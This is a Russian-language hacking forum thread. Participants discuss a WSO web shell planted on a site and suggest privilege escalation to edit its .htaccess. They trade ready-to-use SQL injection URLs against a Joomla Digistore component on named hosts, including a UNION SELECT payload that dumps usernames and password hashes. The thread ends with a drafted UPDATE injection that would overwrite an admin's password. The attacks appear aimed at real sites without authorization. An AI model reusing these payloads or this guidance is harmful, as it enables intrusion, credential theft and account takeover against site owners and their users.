залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
уязвимость (SQL inj) Joomla в компоненте Digistore http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistoreProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user() Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
а в чем проблема? Code: http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
No checkbone? Code: http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
Я сейчас через Canary сижу, ну ладно, суть не в этом. как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный) UNION SELECT group_concat(`username`,`password`),2,3,4 FROM `jos_users` если выполнять SET password='21232f297a57a5a743894a0e4a801fc3' WHERE id = 62; то это должно выглядеть так: /**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62 Поправьте